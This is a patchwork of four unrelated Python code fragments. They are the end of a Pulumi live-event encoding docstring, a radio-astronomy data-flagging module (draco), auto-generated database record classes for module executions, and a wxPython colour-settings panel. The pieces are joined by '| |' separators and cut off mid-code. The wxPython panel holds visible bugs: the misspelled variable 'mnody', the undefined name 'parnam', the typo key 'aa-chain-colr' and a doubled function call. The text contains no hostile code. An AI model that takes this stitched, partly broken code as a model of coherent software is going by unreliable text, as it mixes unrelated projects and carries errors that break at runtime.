type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] key_frame_interval: Use an `ISO 8601` time value between 0.5 to 20 seconds to specify the output fragment length for the video and audio tracks of an encoding live event. For example, use `PT2S` to indicate 2 seconds. For the video track it also defines the key frame interval, or the length of a GoP (group of pictures). If this value is not set for an encoding live event, the fragment duration defaults to 2 seconds. The value cannot be set for pass-through live events.
:param pulumi.Input[str] preset_name: The optional encoding preset name, used when `type` is not `None`. If the `type` is set to `Standard`, then the default preset name is `Default720p`. Else if the `type` is set to `Premium1080p`, the default preset is `Default1080p`. Changing this forces a new resource to be created.
:param pulumi.Input[str] stretch_mode: Specifies how the input video will be resized to fit the desired output resolution(s). Allowed values are `None`, `AutoFit` or `AutoSize`. Default is `None`.
:param pulumi.Input[str] type: Live event type. Allowed values are `None`, `Premium1080p` or `Standard`. When set to `None`, the service simply passes through the incoming video and audio layer(s) to the output. When `type` is set to `Standard` or `Premium1080p`, a live encoder transcodes the incoming stream into multiple bitrates or layers. Defaults to `None`. Changing this forces a new resource to be created.
"""
if key_frame_interval is not None:
pulumi.set(__self__, "key_frame_interval", key_frame_interval)
| |
<filename>draco/analysis/flagging.py
"""Tasks for flagging out bad or unwanted data.
This includes data quality flagging on timestream data; sun excision on sidereal
data; and pre-map making flagging on m-modes.
Tasks
=====
.. autosummary::
:toctree:
DayMask
MaskData
MaskBaselines
RadiometerWeight
SmoothVisWeight
ThresholdVisWeight
RFIMask
RFISensitivityMask
"""
import numpy as np
from scipy.ndimage import median_filter
from caput import config, weighted_median, mpiarray
from ..core import task, containers, io
from ..util import tools
from ..util import rfi
class DayMask(task.SingleTask):
"""Crudely simulate a masking out of the daytime data.
Attributes
----------
start, end : float
Start and end of masked out region.
width : float
Use a smooth transition of given width between the fully masked and
unmasked data. This is interior to the region marked by start and end.
zero_data : bool, optional
Zero the data in addition to modifying the noise weights
(default is True).
remove_average : bool, optional
Estimate and remove the mean level from each visibilty. This estimate
does not use data from the masked region.
"""
start = config.Property(proptype=float, default=90.0)
end = config.Property(proptype=float, default=270.0)
width = config.Property(proptype=float, default=60.0)
zero_data = config.Property(proptype=bool, default=True)
remove_average = config.Property(proptype=bool, default=True)
def process(self, sstream):
"""Apply a day time mask.
Parameters
----------
sstream : containers.SiderealStream
Unmasked sidereal stack.
Returns
-------
mstream : containers.SiderealStream
Masked sidereal stream.
"""
sstream.redistribute("freq")
ra_shift = (sstream.ra[:] - self.start) % 360.0
end_shift = (self.end - self.start) % 360.0
# Crudely mask the on and off regions
mask_bool = ra_shift > end_shift
# Put in the transition at the start of the day
mask = np.where(
ra_shift < self.width,
0.5 * (1 + np.cos(np.pi * (ra_shift / self.width))),
mask_bool,
)
# Put the transition at the end of the day
mask = np.where(
np.logical_and(ra_shift > end_shift - self.width, ra_shift <= end_shift),
0.5 * (1 + np.cos(np.pi * ((ra_shift - end_shift) / self.width))),
mask,
)
if self.remove_average:
# Estimate the mean level from unmasked data
import scipy.stats
nanvis = (
sstream.vis[:]
* np.where(mask_bool, 1.0, np.nan)[np.newaxis, np.newaxis, :]
)
average = scipy.stats.nanmedian(nanvis, axis=-1)[:, :, np.newaxis]
sstream.vis[:] -= average
# Apply the mask to the data
if self.zero_data:
sstream.vis[:] *= mask
# Modify the noise weights
sstream.weight[:] *= mask ** 2
return sstream
class MaskData(task.SingleTask):
"""Mask out data ahead of map making.
Attributes
----------
auto_correlations : bool
Exclude auto correlations if set (default=False).
m_zero : bool
Ignore the m=0 mode (default=False).
positive_m : bool
Include positive m-modes (default=True).
negative_m : bool
Include negative m-modes (default=True).
"""
auto_correlations = config.Property(proptype=bool, default=False)
m_zero = config.Property(proptype=bool, default=False)
positive_m = config.Property(proptype=bool, default=True)
negative_m = config.Property(proptype=bool, default=True)
def process(self, mmodes):
"""Mask out unwanted datain the m-modes.
Parameters
----------
mmodes : containers.MModes
Returns
-------
mmodes : containers.MModes
"""
mmodes.redistribute("freq")
mw = mmodes.weight[:]
# Exclude auto correlations if set
if not self.auto_correlations:
for pi, (fi, fj) in enumerate(mmodes.prodstack):
if fi == fj:
mw[..., pi] = 0.0
# Apply m based masks
if not self.m_zero:
mw[0] = 0.0
if not self.positive_m:
mw[1:, 0] = 0.0
if not self.negative_m:
mw[1:, 1] = 0.0
return mmodes
class MaskBaselines(task.SingleTask):
"""Mask out baselines from a dataset.
This task may produce output with shared datasets. Be warned that
this can produce unexpected outputs if not properly taken into
account.
Attributes
----------
mask_long_ns : float
Mask out baselines longer than a given distance in the N/S direction.
mask_short : float
Mask out baselines shorter than a given distance.
mask_short_ew : float
Mask out baselines shorter then a given distance in the East-West
direction. Useful for masking out intra-cylinder baselines for
North-South oriented cylindrical telescopes.
zero_data : bool, optional
Zero the data in addition to modifying the noise weights
(default is False).
share : {"all", "none", "vis"}
Which datasets should we share with the input. If "none" we create a
full copy of the data, if "vis" we create a copy only of the modified
weight dataset and the unmodified vis dataset is shared, if "all" we
modify in place and return the input container.
"""
mask_long_ns = config.Property(proptype=float, default=None)
mask_short = config.Property(proptype=float, default=None)
mask_short_ew = config.Property(proptype=float, default=None)
zero_data = config.Property(proptype=bool, default=False)
share = config.enum(["none", "vis", "all"], default="all")
def setup(self, telescope):
"""Set the telescope model.
Parameters
----------
telescope : TransitTelescope
"""
self.telescope = io.get_telescope(telescope)
if self.zero_data and self.share == "vis":
self.log.warn(
"Setting `zero_data = True` and `share = vis` doesn't make much sense."
)
def process(self, ss):
"""Apply the mask to data.
Parameters
----------
ss : SiderealStream or TimeStream
Data to mask. Applied in place.
"""
ss.redistribute("freq")
baselines = self.telescope.baselines
mask = np.ones_like(ss.weight[:], dtype=bool)
if self.mask_long_ns is not None:
long_ns_mask = np.abs(baselines[:, 1]) < self.mask_long_ns
mask *= long_ns_mask[np.newaxis, :, np.newaxis]
if self.mask_short is not None:
short_mask = np.sum(baselines ** 2, axis=1) ** 0.5 > self.mask_short
mask *= short_mask[np.newaxis, :, np.newaxis]
if self.mask_short_ew is not None:
short_ew_mask = baselines[:, 0] > self.mask_short_ew
mask *= short_ew_mask[np.newaxis, :, np.newaxis]
if self.share == "all":
ssc = ss
elif self.share == "vis":
ssc = ss.copy(shared=("vis",))
else: # self.share == "all"
ssc = ss.copy()
# Apply the mask to the weight
ssc.weight[:] *= mask
# Apply the mask to the data
if self.zero_data:
ssc.vis[:] *= mask
return ssc
class RadiometerWeight(task.SingleTask):
"""Update vis_weight according to the radiometer equation:
.. math::
\text{weight}_{ij} = N_\text{samp} / V_{ii} V_{jj}
Attributes
----------
replace : bool, optional
Replace any existing weights (default). If `False` then we multiply the
existing weights by the radiometer values.
"""
replace = config.Property(proptype=bool, default=True)
def process(self, stream):
"""Change the vis weight.
Parameters
----------
stream : SiderealStream or TimeStream
Data to be weighted. This is done in place.
Returns
--------
stream : SiderealStream or TimeStream
"""
from caput.time import STELLAR_S
# Redistribute over the frequency direction
stream.redistribute("freq")
ninput = len(stream.index_map["input"])
nprod = len(stream.index_map["prod"])
if nprod != (ninput * (ninput + 1) // 2):
raise RuntimeError(
"Must have a input stream with the full correlation triangle."
)
freq_width = np.median(stream.index_map["freq"]["width"])
if isinstance(stream, containers.SiderealStream):
RA_S = 240 * STELLAR_S # SI seconds in 1 deg of RA change
int_time = np.median(np.abs(np.diff(stream.ra))) / RA_S
else:
int_time = np.median(np.abs(np.diff(stream.index_map["time"])))
if self.replace:
stream.weight[:] = 1.0
# Construct and set the correct weights in place
nsamp = 1e6 * freq_width * int_time
autos = tools.extract_diagonal(stream.vis[:]).real
weight_fac = nsamp ** 0.5 / autos
tools.apply_gain(stream.weight[:], weight_fac, out=stream.weight[:])
# Return timestream with updated weights
return stream
class SmoothVisWeight(task.SingleTask):
"""Smooth the visibility weights with a median filter.
This is done in-place.
Attributes
----------
kernel_size : int
Size of the kernel for the median filter in time points.
Default is 31, corresponding to ~5 minutes window for 10s cadence data.
"""
# 31 time points correspond to ~ 5min in 10s cadence
kernel_size = config.Property(proptype=int, default=31)
def process(self, data):
"""Smooth the weights with a median filter.
Parameters
----------
data : :class:`andata.CorrData` or :class:`containers.TimeStream` object
Data containing the weights to be smoothed
Returns
-------
data : Same object as data
Data object containing the same data as the input, but with the
weights substituted by the smoothed ones.
"""
# Ensure data is distributed in frequency:
data.redistribute("freq")
# Full slice reutrns an MPIArray
weight = data.weight[:]
# Data will be distributed in frequency.
# So a frequency loop will not be too large.
for lfi, gfi in weight.enumerate(axis=0):
# MPIArray takes the local index, returns a local np.ndarray
# Find values equal to zero to preserve them in final weights
zeromask = weight[lfi] == 0.0
# Median filter. Mode='nearest' to prevent steps close to
# the end from being washed
weight[lfi] = median_filter(
weight[lfi], size=(1, self.kernel_size), mode="nearest"
)
# Ensure zero values are zero
weight[lfi][zeromask] = 0.0
return data
class ThresholdVisWeight(task.SingleTask):
"""Set any weight less than the user specified threshold equal to zero.
Threshold is determined as `maximum(absolute_threshold,
relative_threshold * mean(weight))` and is evaluated per product/stack
entry.
Parameters
----------
absolute_threshold : float
Any weights with values less than this number will be set to zero.
relative_threshold : float
Any weights with values less than this number times the average weight
will be set to zero.
"""
absolute_threshold = config.Property(proptype=float, default=1e-7)
relative_threshold = config.Property(proptype=float, | |
= False
for i in xrange(len(self._db_actions)):
if self._db_actions[i].db_id == action.db_id:
self._db_actions[i] = action
found = True
break
if not found:
self._db_actions.append(action)
self.db_actions_id_index[action.db_id] = action
def db_delete_action(self, action):
self.is_dirty = True
for i in xrange(len(self._db_actions)):
if self._db_actions[i].db_id == action.db_id:
if not self._db_actions[i].is_new:
self.db_deleted_actions.append(self._db_actions[i])
del self._db_actions[i]
break
del self.db_actions_id_index[action.db_id]
def db_get_action(self, key):
for i in xrange(len(self._db_actions)):
if self._db_actions[i].db_id == key:
return self._db_actions[i]
return None
def db_get_action_by_id(self, key):
return self.db_actions_id_index[key]
def db_has_action_with_id(self, key):
return key in self.db_actions_id_index
def __get_db_tags(self):
return self._db_tags
def __set_db_tags(self, tags):
self._db_tags = tags
self.is_dirty = True
db_tags = property(__get_db_tags, __set_db_tags)
def db_get_tags(self):
return self._db_tags
def db_add_tag(self, tag):
self.is_dirty = True
self._db_tags.append(tag)
self.db_tags_id_index[tag.db_id] = tag
self.db_tags_name_index[tag.db_name] = tag
def db_change_tag(self, tag):
self.is_dirty = True
found = False
for i in xrange(len(self._db_tags)):
if self._db_tags[i].db_id == tag.db_id:
self._db_tags[i] = tag
found = True
break
if not found:
self._db_tags.append(tag)
self.db_tags_id_index[tag.db_id] = tag
self.db_tags_name_index[tag.db_name] = tag
def db_delete_tag(self, tag):
self.is_dirty = True
for i in xrange(len(self._db_tags)):
if self._db_tags[i].db_id == tag.db_id:
if not self._db_tags[i].is_new:
self.db_deleted_tags.append(self._db_tags[i])
del self._db_tags[i]
break
del self.db_tags_id_index[tag.db_id]
del self.db_tags_name_index[tag.db_name]
def db_get_tag(self, key):
for i in xrange(len(self._db_tags)):
if self._db_tags[i].db_id == key:
return self._db_tags[i]
return None
def db_get_tag_by_id(self, key):
return self.db_tags_id_index[key]
def db_has_tag_with_id(self, key):
return key in self.db_tags_id_index
def db_get_tag_by_name(self, key):
return self.db_tags_name_index[key]
def db_has_tag_with_name(self, key):
return key in self.db_tags_name_index
def __get_db_annotations(self):
return self._db_annotations
def __set_db_annotations(self, annotations):
self._db_annotations = annotations
self.is_dirty = True
db_annotations = property(__get_db_annotations, __set_db_annotations)
def db_get_annotations(self):
return self._db_annotations
def db_add_annotation(self, annotation):
self.is_dirty = True
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_change_annotation(self, annotation):
self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
self.db_annotations_key_index[annotation.db_key] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
del self.db_annotations_key_index[annotation.db_key]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def db_get_annotation_by_key(self, key):
return self.db_annotations_key_index[key]
def db_has_annotation_with_key(self, key):
return key in self.db_annotations_key_index
def getPrimaryKey(self):
return self._db_id
class DBModuleExec(object):
vtType = 'module_exec'
def __init__(self, id=None, ts_start=None, ts_end=None, cached=None, module_id=None, module_name=None, completed=None, error=None, abstraction_id=None, abstraction_version=None, machine_id=None, annotations=None, loop_execs=None):
self._db_id = id
self._db_ts_start = ts_start
self._db_ts_end = ts_end
self._db_cached = cached
self._db_module_id = module_id
self._db_module_name = module_name
self._db_completed = completed
self._db_error = error
self._db_abstraction_id = abstraction_id
self._db_abstraction_version = abstraction_version
self._db_machine_id = machine_id
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_deleted_loop_execs = []
self.db_loop_execs_id_index = {}
if loop_execs is None:
self._db_loop_execs = []
else:
self._db_loop_execs = loop_execs
for v in self._db_loop_execs:
self.db_loop_execs_id_index[v.db_id] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBModuleExec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBModuleExec(id=self._db_id,
ts_start=self._db_ts_start,
ts_end=self._db_ts_end,
cached=self._db_cached,
module_id=self._db_module_id,
module_name=self._db_module_name,
completed=self._db_completed,
error=self._db_error,
abstraction_id=self._db_abstraction_id,
abstraction_version=self._db_abstraction_version,
machine_id=self._db_machine_id)
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
if self._db_loop_execs is None:
cp._db_loop_execs = []
else:
cp._db_loop_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_loop_execs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_module_id') and ('module', self._db_module_id) in id_remap:
cp._db_module_id = id_remap[('module', self._db_module_id)]
if hasattr(self, 'db_machine_id') and ('machine', self._db_machine_id) in id_remap:
cp._db_machine_id = id_remap[('machine', self._db_machine_id)]
# recreate indices and set flags
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_loop_execs_id_index = dict((v.db_id, v) for v in cp._db_loop_execs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBModuleExec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ts_start' in class_dict:
res = class_dict['ts_start'](old_obj, trans_dict)
new_obj.db_ts_start = res
elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
new_obj.db_ts_start = old_obj.db_ts_start
if 'ts_end' in class_dict:
res = class_dict['ts_end'](old_obj, trans_dict)
new_obj.db_ts_end = res
elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
new_obj.db_ts_end = old_obj.db_ts_end
if 'cached' in class_dict:
res = class_dict['cached'](old_obj, trans_dict)
new_obj.db_cached = res
elif hasattr(old_obj, 'db_cached') and old_obj.db_cached is not None:
new_obj.db_cached = old_obj.db_cached
if 'module_id' in class_dict:
res = class_dict['module_id'](old_obj, trans_dict)
new_obj.db_module_id = res
elif hasattr(old_obj, 'db_module_id') and old_obj.db_module_id is not None:
new_obj.db_module_id = old_obj.db_module_id
if 'module_name' in class_dict:
res = class_dict['module_name'](old_obj, trans_dict)
new_obj.db_module_name = res
elif hasattr(old_obj, 'db_module_name') and old_obj.db_module_name is not None:
new_obj.db_module_name = old_obj.db_module_name
if 'completed' in class_dict:
res = class_dict['completed'](old_obj, trans_dict)
new_obj.db_completed = res
elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
new_obj.db_completed = old_obj.db_completed
if 'error' in class_dict:
res = class_dict['error'](old_obj, trans_dict)
new_obj.db_error = res
elif hasattr(old_obj, 'db_error') and old_obj.db_error is not None:
new_obj.db_error = old_obj.db_error
if 'abstraction_id' in class_dict:
res = class_dict['abstraction_id'](old_obj, trans_dict)
new_obj.db_abstraction_id = res
elif hasattr(old_obj, 'db_abstraction_id') and old_obj.db_abstraction_id is not None:
new_obj.db_abstraction_id = old_obj.db_abstraction_id
if 'abstraction_version' in class_dict:
res = class_dict['abstraction_version'](old_obj, trans_dict)
new_obj.db_abstraction_version = res
elif hasattr(old_obj, 'db_abstraction_version') and old_obj.db_abstraction_version is not None:
new_obj.db_abstraction_version = old_obj.db_abstraction_version
if 'machine_id' in class_dict:
res = class_dict['machine_id'](old_obj, trans_dict)
new_obj.db_machine_id = res
elif hasattr(old_obj, 'db_machine_id') and old_obj.db_machine_id is not None:
new_obj.db_machine_id = old_obj.db_machine_id
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
if 'loop_execs' in class_dict:
res = class_dict['loop_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_loop_exec(obj)
elif hasattr(old_obj, 'db_loop_execs') and old_obj.db_loop_execs is not None:
for obj in old_obj.db_loop_execs:
new_obj.db_add_loop_exec(DBLoopExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_loop_execs') and hasattr(new_obj, 'db_deleted_loop_execs'):
for obj in old_obj.db_deleted_loop_execs:
n_obj = DBLoopExec.update_version(obj, trans_dict)
new_obj.db_deleted_loop_execs.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_annotations:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_annotation(child)
to_del = []
for child in self.db_loop_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_loop_exec(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_annotations)
children.extend(self.db_deleted_loop_execs)
if remove:
self.db_deleted_annotations = []
self.db_deleted_loop_execs = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_annotations:
if child.has_changes():
return True
for child in self._db_loop_execs:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_ts_start(self):
return self._db_ts_start
def __set_db_ts_start(self, ts_start):
self._db_ts_start = ts_start
self.is_dirty = True
db_ts_start = property(__get_db_ts_start, __set_db_ts_start)
def db_add_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_change_ts_start(self, ts_start):
self._db_ts_start = ts_start
def db_delete_ts_start(self, ts_start):
self._db_ts_start = None
def __get_db_ts_end(self):
return self._db_ts_end
def __set_db_ts_end(self, ts_end):
self._db_ts_end = ts_end
self.is_dirty = True
db_ts_end = property(__get_db_ts_end, __set_db_ts_end)
def db_add_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_change_ts_end(self, ts_end):
self._db_ts_end = ts_end
def db_delete_ts_end(self, ts_end):
self._db_ts_end = None
def __get_db_cached(self):
return self._db_cached
def __set_db_cached(self, cached):
self._db_cached = cached
self.is_dirty = True
db_cached = property(__get_db_cached, __set_db_cached)
def db_add_cached(self, cached):
self._db_cached = cached
def db_change_cached(self, cached):
self._db_cached = cached
def db_delete_cached(self, cached):
self._db_cached = None
def __get_db_module_id(self):
return self._db_module_id
def __set_db_module_id(self, module_id):
self._db_module_id = module_id
self.is_dirty = True
db_module_id = property(__get_db_module_id, __set_db_module_id)
def db_add_module_id(self, module_id):
self._db_module_id = module_id
def db_change_module_id(self, module_id):
self._db_module_id = module_id
def db_delete_module_id(self, module_id):
self._db_module_id = None
def __get_db_module_name(self):
return self._db_module_name
def __set_db_module_name(self, module_name):
self._db_module_name = module_name
self.is_dirty = True
db_module_name = property(__get_db_module_name, __set_db_module_name)
def db_add_module_name(self, module_name):
self._db_module_name = module_name
def db_change_module_name(self, module_name):
self._db_module_name = module_name
def db_delete_module_name(self, module_name):
self._db_module_name = None
def __get_db_completed(self):
return self._db_completed
def __set_db_completed(self, completed):
self._db_completed = completed
self.is_dirty = True
db_completed = property(__get_db_completed, __set_db_completed)
def db_add_completed(self, completed):
self._db_completed = completed
def db_change_completed(self, completed):
| |
#self.elmcolorobjdic,'dic-color'],
'aa-residue-color':['Method',self.parent.GetButtonColors,self.colorpanelobjdic['residue'][1],'dic-color'],
#self.rescolorobjdic,'dic-color'],
'aa-chain-color':['Method',self.parent.GetButtonColors,self.colorpanelobjdic['chain'][1],'dic-color']
#self.chaincolorobjdic,'dic-color']
}
return paramobj
def GetParamsFromWidgets(self):
self.newparamdic={}
for prmnam, widget in self.paramwidgetdic.iteritems():
if widget[0] == 'TextCtrl': self.newparamdic[prmnam]=widget[1].GetValue()
elif widget[0] == 'ComboBox': self.newparamdic[prmnam]=widget[1].GetValue()
elif widget[0] == 'Button':
wxcolor=widget[1].GetBackgroundColour() # wx.Colour object
self.newparamdic[prmnam]=wxcolor.Get() # convert to RGB [0-255]
elif widget[0] == 'Method': self.newparamdic[prmnam]=widget[1](widget[2])
else: print 'Error: widget in GetParamsFromWidget. param name=',prmnam
def SetParamsToWidgets(self,paramsdic):
""" note: color intensitiy of r,g, and b, ranges from 0 to 255! """
for prmnam, value in paramsdic.iteritems():
if not self.paramwidgetdic.has_key(prmnam): continue
widget=self.paramwidgetdic[prmnam]
if widget[0] == 'TextCtrl': widget[1].SetValue(str(value))
elif widget[0] == 'ComboBox': widget[1].SetValue(str(value))
elif widget[0] == 'Button': widget[1].SetBackgroundColour(value[:3]) # wx.Colour object
elif widget[0] == 'Method':
if prmnam == 'element-color':
colordic=paramsdic['element-color']
colorobjdic=self.colorpanelobjdic['element'][1]
self.parent.SetColorOnButtons(colorobjdic,colordic)
elif prmnam == 'aa-residue-color':
colordic=paramsdic['aa-residue-color']
colorobjdic=self.colorpanelobjdic['residue'][1]
self.parent.SetColorOnButtons(colorobjdic,colordic)
elif prmnam == 'aa-chain-color':
colordic=paramsdic['aa-chain-color']
colorobjdic=self.colorpanelobjdic['chain'][1]
self.parent.SetColorOnButtons(colorobjdic,colordic)
else: print 'Error: widget in SetParamsToWidget. param name=',parnam
def CountModifiedParams(self):
nmody=0
for prmnam, value in self.currentparams.iteritems():
if self.newparamdic.has_key(prmnam):
if self.currentparams[prmnam] != self.newparamdic[prmnam]: nmody += 1
return mnody
def LoadDefaultElmColor(self):
""" not used """
colordic=ctrl.SettingCtrl.DefaultElementColor()
for item,color in colordic.iteritems():
color=numpy.array(color); color=255*color; color=color[:3]
colordic[item]=color
return colordic
def LoadDefaultResColor(self):
""" not used """
colordic=ctrl.SettingCtrl.DefaultAAResidueColor()
for item,color in colordic.iteritems():
color=numpy.array(color); color=255*color; color=color[:3]
colordic[item]=color
return colordic
def LoadDefaultChainColor(self):
""" not used """
colordic=ctrl.SettingCtrl.DefaultAAChainColor()()
for item,color in colordic.iteritems():
color=numpy.array(color); color=255*color; color=color[:3]
colordic[item]=color
return colordic
def LoadDefault(self):
self.parent.Message('')
self.paramsdic=copy.deepcopy(self.defaultparamsdic)
self.cmbfil.SetValue('')
self.SetParamsToWidgets(self.paramsdic)
def GetDefaultModelParams(self):
defaultdic={}
for prmnam,type in self.paramtypedic.iteritems():
defaultdic[prmnam]=self.setctrl.GetDefaultParam(prmnam)
if defaultdic[prmnam] == None: print 'Not found prmnam=',prmnam
defaultdic=self.parent.ConvertParamsForCustomize(defaultdic,self.paramtypedic)
return defaultdic
def OnAddDelButton(self,event):
self.parent.Message('')
obj=event.GetEventObject()
btnnmb=self.adddelbtnlst.index(obj)
modnmb=btnnmb % 2
stat=obj.GetValue()
notstat=not stat
if modnmb == 0 and stat: self.adddelbtnlst[btnnmb+1].SetValue(notstat)
if modnmb == 0 and notstat: self.adddelbtnlst[btnnmb+1].SetValue(stat)
if modnmb == 1 and stat: self.adddelbtnlst[btnnmb-1].SetValue(notstat)
if modnmb == 1 and notstat: self.adddelbtnlst[btnnmb-1].SetValue(stat)
def OnInputItem(self,event):
self.parent.Message('')
itemnmbdic={0:0,2:1,4:2}; itemnamlst=['element','residue','chain']
paramnamdic={'element':'element-color','residue':'aa-residue-color','chain':'aa-chain-colr'}
#
ID=event.GetId()
self.parent.Message('')
#
input=self.inputtcldic[ID][1].GetValue()
if input == '': return
#
nmb=self.inputtcldic[ID][0] # nmb:0 'element', 2:'residue', 4: 'chain'
itemnmb=itemnmbdic[nmb] # item number: 0 'element', 1:'residue', 2:'chain'
item=itemnamlst[itemnmb]
# scroll position
[x,y]=self.colorpanelobjdic[item][0].GetViewStart()
oldcolorobjdic=self.colorpanelobjdic[item][1]
# upper case
if item == 'element':
input=input.upper(); input=input.rjust(2,' ')
elif item == 'residue':
input=input.upper(); input=input.ljust(3,' ')
else:
if not input.isdigit():
self.parent.Message('Wrong input data. "'+input+'". Integers only')
return
else: input=int(input)
# add/del
addbtn=self.adddelbtnlst[nmb]
add=addbtn.GetValue()
# add or del input element in item
namlst,colordic=self.AddDelParamItem(add,item,input)
if len(namlst) <= 0:
self.inputtcldic[ID][1].SetValue('')
return
# destroy item color panel
self.DestroyColorButtonsOnPanel(oldcolorobjdic)
# re-create item color panel
pan=self.colorpanelobjdic[item][0]
colorobjdic=self.CreateColorButtonsOnPanel(pan,item,namlst,colordic)
self.colorpanelobjdic[item]=[pan,colorobjdic]
# reset widgetdic
prmnam=paramnamdic[item]
self.paramwidgetdic[prmnam]=['Method',self.parent.GetButtonColors,colorobjdic]
# set scrolled position
if add:
idx=namlst.index(input)
x=0; y=(idx-1)*20
self.colorpanelobjdic[item][0].Scroll(x,y)
# clear input text control
self.inputtcldic[ID][1].SetValue('')
self.saved=False
def AddDelParamItem(self,add,item,input):
# itemnmb: 0 'element', 1:'residue', 2: 'chain'
# get scroll position
[x,y]=self.colorpanelobjdic[item][0].GetViewStart()
# check duplicate
colorobjdic=self.colorpanelobjdic[item][1]
if add and colorobjdic.has_key(input):
self.parent.Message('item "'+input+'" already exists.')
return [],{}
if not add and not colorobjdic.has_key(input):
self.parent.Message('item "'+input+'" does not exist.')
return [],{}
#
defcolor=[0,0,0] # black
if item == 'element':
if add: self.elmcolordic[input]=defcolor
else:
if input == 'XX' or input == '??':
self.parent.Message('Do not delete "'+input+'".')
return
del self.elmcolordic[input]
self.paramsdic['element-color']=self.elmcolordic
#self.paramsdic=self.parent.ConvertParamsForCustomize(self.paramsdic,self.paramtypedic)
self.elmnamlst=self.elmcolordic.keys()
namlst=self.elmnamlst
namlst.sort()
colordic=self.elmcolordic
elif item == 'residue':
if add: self.rescolordic[input]=defcolor
else:
if input == '???':
self.parent.Message('Do not delete "'+input+'".')
return
del self.rescolordic[input]
self.paramsdic['aa-residue-color']=self.rescolordic
self.resnamlst=self.rescolordic.keys()
namlst=self.resnamlst
namlst.sort()
colordic=self.rescolordic
elif item == 'chain':
if add: self.chaincolordic[input]=defcolor
else: del self.chaincolordic[input]
self.paramsdic['aa-chain-color']=self.chaincolordic
self.chainnamlst=self.chaincolordic.keys()
namlst=self.chainnamlst
namlst.sort()
colordic=self.chaincolordic
self.itemcolordic[input]=[255,0,0]
return namlst,colordic
def OnButtonColor(self,event):
self.saveas=False
self.parent.Message('')
obj=event.GetEventObject()
color=lib.ChooseColorOnPalette(self.parent,True,-1)
if color != None:
obj.SetBackgroundColour(color)
obj.Refresh()
def OnFile(self,event):
self.parent.Message('')
self.saveas=False
if not self.saved:
mess='Current parameter set is not saved. Are you sure to move?.'
dlg=lib.MessageBoxYesNo(mess,"")
if not dlg:
self.cmbfil.SetValue(self.curset)
return
#
curset=self.cmbfil.GetValue()
filename=curset
if len(filename) <= 0: return
filename=self.parent.MakeFullPathName(filename,'.model')
ans=self.parent.IsFileExists(filename)
if not ans: return
# load params
paramsdic=ctrl.SettingCtrl.ReadParamSetFile(filename,self.paramtypedic)
# convert color 4 to 3 components
paramsdic=self.parent.ConvertParamsForCustomize(paramsdic,self.paramtypedic)
